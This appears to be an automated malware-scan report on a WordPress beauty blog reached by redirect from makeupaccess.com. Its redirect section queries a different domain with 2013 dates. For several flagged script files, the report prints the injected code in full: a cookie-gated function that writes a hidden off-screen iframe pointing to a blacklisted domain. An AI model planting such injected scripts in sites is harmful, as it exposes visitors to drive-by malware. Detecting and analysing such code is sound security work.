Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=makeupaccess.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nsscoaching.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
GET / HTTP/1.1
Host: nsscoaching.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nsscoaching.com
Referer: http://www.google.com/search?q=nsscoaching.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nsscoaching.com
Referer: http://www.google.com/search?q=nsscoaching.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.makeupaccess.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Sep 2014 09:26:45 GMT Location: http://lipstickandleisure.com/ Server: Apache Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lipstickandleisure.com/ | 200 OK Content-Length: 104262 Content-Type: text/html | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/fc1JDoAgDAXQCzHEcCIglUEZZIji6Y0Rduqq_6d9KaN2q5AaYj1gZ1TiBYgzHk0067ALc46J41qV8XTmXjYRjo7I6CRyuXwzmwcoGhzE6qUmzy7_P3yV_SamcOML.js | 200 OK Content-Length: 140502 Content-Type: text/javascript | malicious |
Page code contains blacklisted domain: diglamuin.brendaberstein.com.ar ...[109 bytes skipped]... ires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku(); /* jQuery v1.11.0 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */ !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof win ...[3015 bytes skipped]... Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> | ||
http://lipstickandleisure.com/wp-content/cache/minify/000000/XYxBDoMwDAQ_VDtE6n-q1BgwMkmIHVX8vlJQL73Ozk4M-9m5XVAlgzi8u3vJsJQGcqSVLewWjJpUx0PyYwozq1ByHkOv3Bax7Y_fTaSLlDGpjmsMtZgbUGqlGyt8ZF7Zh_9jKs6viBNGen4B.js | 200 OK Content-Length: 20775 Content-Type: text/javascript | malicious |
Page code contains blacklisted domain: diglamuin.brendaberstein.com.ar ...[109 bytes skipped]... ires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku();(function(e){"use strict";window.jpibfi=function(){function a(t){var n=jQuery("<a/>",{href:"#","class":"pinit-button","data-jpibfi-indexer":t,text:""});n.click(function(t){h("Pin In button clicked");var n=e(this).data("jpibfi-indexer");var r=e('img[data-jpibfi-indexer="'+n+'"]');var i="",s="",o="";if(u.settings.usePostUrl){var ...[3078 bytes skipped]... Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> | ||
https://wprp.zemanta.com/static/js/loader.js?version=3.5.1 | 200 OK Content-Length: 11783 Content-Type: application/javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/M9BPSc3JTE4sSdVPK81LLsnMzyvWzyrWL87ILypJzk9JBQA.js | 200 OK Content-Length: 692 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: diglamuin.brendaberstein.com.ar function Vuelingflytersku(){function setCookie(name,value,expires){var date=new Date(new Date().getTime()+expires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku(); Decoded script: <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe> Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> | ||
http://www.makeupaccess.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Sep 2014 09:26:52 GMT Location: http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 348 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 32636 Content-Type: text/html | clean |
http://lipstickandleisure.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 27 Sep 2014 09:26:54 GMT Pragma: no-cache Location: http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://lipstickandleisure.com/xmlrpc.php | clean |
http://lipstickandleisure.com/test404page.js | 404 Not Found Content-Length: 32636 Content-Type: text/html | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/dcvRCoAgDEDRHwp98Is0x1ioq7kR9fXRY7Be7-GmaBS3w0CuYBRWFgidxpK-_aSKoJ50tukuApPuXJqLVTLiHxZT5eHJzpOUfKuUG-MrDw.js | 200 OK Content-Length: 51599 Content-Type: text/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201439 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/hczBDYAgEAXRhtQNRVjIRn4QxAVZkNi9Hrwaz5M3hgJq5mWjPdkWodSzK2lNg6F-qQ88CrpG1IqiFJROjt5yBUUW19g9JBwN5Zre4pPM4rxghPxfPuwN.js | 200 OK Content-Length: 83933 Content-Type: text/javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/M9QvryzOzErUzUstL85JLSlJLSrWzyrWTyvKzyvRLS5NKk4uykwCCgIA.js | 200 OK Content-Length: 3863 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201439.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://lipstickandleisure.com/category/beauty/ | 200 OK Content-Length: 95772 Content-Type: text/html | clean |
http://lipstickandleisure.com/category/decor/ | 200 OK Content-Length: 73635 Content-Type: text/html | clean |